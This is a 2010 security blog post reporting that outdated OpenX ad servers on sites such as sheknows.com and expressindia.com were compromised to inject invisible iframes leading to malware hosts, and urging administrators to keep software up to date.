Still More Malicious Ads

July 13, 2010 - By Chris Larsen,

About two months ago (OpenX Serving More Than Ads) I wrote about compromised ad servers silently connecting browsers to malware while users perused legitimate sites.

Out-of-date ad server software continues to be a problem. Here are some examples from last week...

 

The site soaps.sheknows.com uses OpenX to display an image linked to their Facebook page:

infected ad example 1

The JavaScript used to inject this image into the page has been modified by an attacker to create an invisible iframe to an attack site: 91.213.174.37 which relays to the malware host on 91.213.174.35 -- both of which are IP addresses belonging to an ISP in Russia (VolgaHost).

 

The site lovingyou.com has a large banner ad on its main page, which changes when the page is refreshed:

infected ad sample 2

This ad is created by including JavaScript from advertising.sheknows.com. This is an example of a nice two-for-one deal for the Bad Guys: a compromise of the ad server at sheknows.com affects not only that site's visitors, but the visitors of sites that use its advertisements.

 

Lastly, here's a banner ad that appeared on indianexpress.com and expressindia.com, both of which use the same OpenX ad server (promo.expressindia.com):

infected ad sample 4

This advertisement actually originates from doubleclick.net, but the ExpressIndia sites use OpenX to wrap the code that serves the ad. When the legitimate ad is injected, so is an invisible iframe that points to malware.

 

It's always important to keep your software up-to-date. This especially holds true for services running on publicly accessible servers. All of these examples are running OpenX version 2.8.1 (current version is 2.8.5; these sites are about 6 months behind.)

And, if you think that only ad servers hosted by smaller sites are to blame, think again. Even large advertising networks fall prey to Bad Guys who inject malicious content into ad streams. Over the past week, I've observed connections to malware sites that have originated from ads served on pages like nasdaq.com, nydailynews.com, and latimes.com.

 

--TvdH